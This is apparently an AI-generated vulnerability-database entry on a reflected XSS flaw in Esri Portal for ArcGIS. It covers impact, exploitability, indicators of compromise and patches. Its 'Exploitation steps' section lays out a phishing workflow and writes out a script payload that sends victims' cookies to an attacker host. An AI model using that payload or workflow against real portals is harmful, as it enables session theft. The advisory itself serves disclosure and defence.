CVE-2026-69234
Portal for ArcGIS vulnerability analysis and mitigation

Overview

CVE-2026-69234 is a reflected cross-site scripting (XSS) vulnerability in Esri Portal for ArcGIS affecting versions 11.1 through 11.5. It allows a remote, unauthenticated attacker to craft a malicious link that, when clicked by a victim, executes arbitrary JavaScript code in the victim's browser. The vulnerability was published on August 21, 2026, by Esri (Environmental Systems Research Institute, Inc.). It carries a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, Esri Security Bulletin).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the reflected XSS variant (CAPEC-591). The root cause is insufficient sanitization of user-supplied input that is reflected back in HTTP responses without proper encoding, allowing injected JavaScript to execute in the victim's browser context. Exploitation requires no authentication and no special privileges, but does require user interaction — specifically, a victim must click a crafted link. No technical write-ups or public proof-of-concept code have been identified at this time (GitHub Advisory, Esri Security Bulletin).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser with the same privileges as the authenticated user, potentially enabling theft of session cookies, authentication tokens, or sensitive data displayed on the page. The scope change in the CVSS vector (S:C) indicates that the impact extends beyond the vulnerable component itself to the victim's browser environment. Availability is not directly impacted, but confidentiality and integrity are both assessed as low-impact per the CVSS scoring (GitHub Advisory).

Exploitability

There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation at this time. The EPSS score is approximately 0.235% (15th percentile), indicating a low near-term probability of exploitation. The vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing Esri Portal for ArcGIS instances running versions 11.1 through 11.5 using tools such as Shodan or Censys, or by reviewing organizational asset inventories.
  2. Identify vulnerable endpoint: Locate a portal endpoint that reflects user-supplied input (e.g., URL parameters or query strings) without proper sanitization in the HTTP response.
  3. Craft malicious link: Construct a URL targeting the vulnerable endpoint with a JavaScript payload embedded in a reflected parameter, such as https://target-portal/arcgis/home/search.html?q=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver the link: Send the crafted URL to a target user via phishing email, social engineering, or other delivery mechanisms to induce the victim to click it.
  5. Harvest results: When the victim clicks the link and the page loads, the injected JavaScript executes in their browser, potentially exfiltrating session cookies or authentication tokens to an attacker-controlled server (GitHub Advisory, Esri Security Bulletin).

Indicators of compromise

  • Network: Outbound HTTP requests from a victim's browser to unexpected external domains shortly after accessing a Portal for ArcGIS URL; unusual GET/POST requests to attacker-controlled infrastructure containing encoded cookie or token data.
  • Logs: Portal for ArcGIS web server access logs showing requests with URL-encoded JavaScript payloads (e.g., %3Cscript%3E, javascript:, onerror=) in query string parameters; referrer headers pointing to external or unexpected sources.
  • Browser/Client: Browser developer console errors or network requests to unfamiliar domains triggered by Portal for ArcGIS page loads; unexpected redirects originating from portal URLs.

Mitigation and workarounds

Esri has released patches for ArcGIS Enterprise versions 11.1, 11.3, and 11.5; users on these versions are encouraged to apply the available patches promptly. All users are advised to upgrade to the latest long-term support release of ArcGIS Enterprise. Users of ArcGIS Web App Builder developer edition should migrate to ArcGIS Experience Builder, as the developer edition is no longer supported. Details on the patches are available in the August 2026 ArcGIS Security Bulletin (Esri Security Bulletin).

Additional resources


SourceThis report was generated using AI

Related Portal for ArcGIS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-69236MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69235MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69234MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69237LOW3.8
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69238LOW3.5
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management